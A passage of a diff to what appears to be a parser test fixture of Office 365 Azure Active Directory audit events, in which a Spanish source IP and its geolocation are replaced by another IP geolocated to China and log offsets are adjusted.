-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7161,8 +7073,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7177,7 +7089,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 229197,
+        "log.offset": 229109,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7206,9 +7118,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7300,20 +7212,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7324,8 +7234,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7340,7 +7250,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 234395,
+        "log.offset": 234305,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7369,9 +7279,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7463,20 +7373,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7487,8 +7395,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7503,7 +7411,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 239593,
+        "log.offset": 239501,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7532,9 +7440,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7626,20 +7534,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7650,8 +7556,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7666,7 +7572,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 244748,
+        "log.offset": 244654,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7695,9 +7601,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7789,20 +7695,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7813,8 +7717,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7829,7 +7733,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 249903,
+        "log.offset": 249807,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -7858,9 +7762,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -7952,20 +7856,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -7976,8 +7878,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:17:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -7992,7 +7894,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 255101,
+        "log.offset": 255003,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8021,9 +7923,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:17:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8115,20 +8017,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8139,8 +8039,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8155,7 +8055,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 260299,
+        "log.offset": 260199,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8184,9 +8084,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8279,20 +8179,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8303,8 +8201,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Consent to application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8319,7 +8217,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 264870,
+        "log.offset": 264768,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8348,9 +8246,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8443,20 +8341,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8467,8 +8363,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8483,7 +8379,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 269441,
+        "log.offset": 269337,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8512,9 +8408,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8606,20 +8502,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8630,8 +8524,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8646,7 +8540,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 274829,
+        "log.offset": 274723,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8675,9 +8569,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8769,20 +8663,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8793,8 +8685,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8809,7 +8701,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 280217,
+        "log.offset": 280109,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -8838,9 +8730,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -8932,20 +8824,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -8956,8 +8846,8 @@
     },
     {
         "@timestamp": "2020-02-10T15:30:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -8972,7 +8862,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 285605,
+        "log.offset": 285495,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -9001,9 +8891,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:30:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -9095,20 +8985,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
